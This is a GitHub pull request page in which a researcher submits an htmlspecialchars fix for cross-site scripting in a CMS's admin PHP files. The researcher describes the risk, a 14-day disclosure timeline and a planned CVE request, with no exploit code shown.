Administrator/add_pictures.php,Administrator/users.php(fix): used htm… #3
Add this suggestion to a batch that can be applied as a single commit.
This suggestion is invalid because no changes were made to the code.
Suggestions cannot be applied while the pull request is closed.
Suggestions cannot be applied while viewing a subset of changes.
Only one suggestion per line can be applied in a batch.
Add this suggestion to a batch that can be applied as a single commit.
Applying suggestions on deleted lines is not supported.
You must change the existing code in this line in order to create a valid suggestion.
Outdated suggestions cannot be applied.
This suggestion has been applied or marked resolved.
Suggestions cannot be applied from pending reviews.
Suggestions cannot be applied on multi-line comments.
Suggestions cannot be applied while the pull request is queued to merge.
…lspecialchars variable to ensure that XSS is prevented by replacing any possible bad chars
Dear Repository maintainer,
Hope you are going well and had a Merry Christmas.
Administrator/add_pictures.php,Administrator/users.php(fix): used htmlspecialchars variable to ensure that XSS is prevented by replacing any possible bad chars
Without applying this temporary fix, it is possible to trick admins of the CMS to be tricked into executing arbitrary javascript code and have their cookies stolen OR tricked into revealing info of other websites through tools such as BEEF Hook. PoC can be provided if required.
I would like to release the PoC exploit after 2 weeks (14 days) - could you please let me know on manasmbellani@gmail.com if you have any queries, concerns or issues with the requested fix. I would recommend pulling this branch version and updating to the latest as soon as possible.
I will also be requesting a CVE number via CVE Mitre for this bug.
Wish you a very Happy New Year!
Thanks and Kind Regards,
Manas Bellani
manasmbellani@gmail.com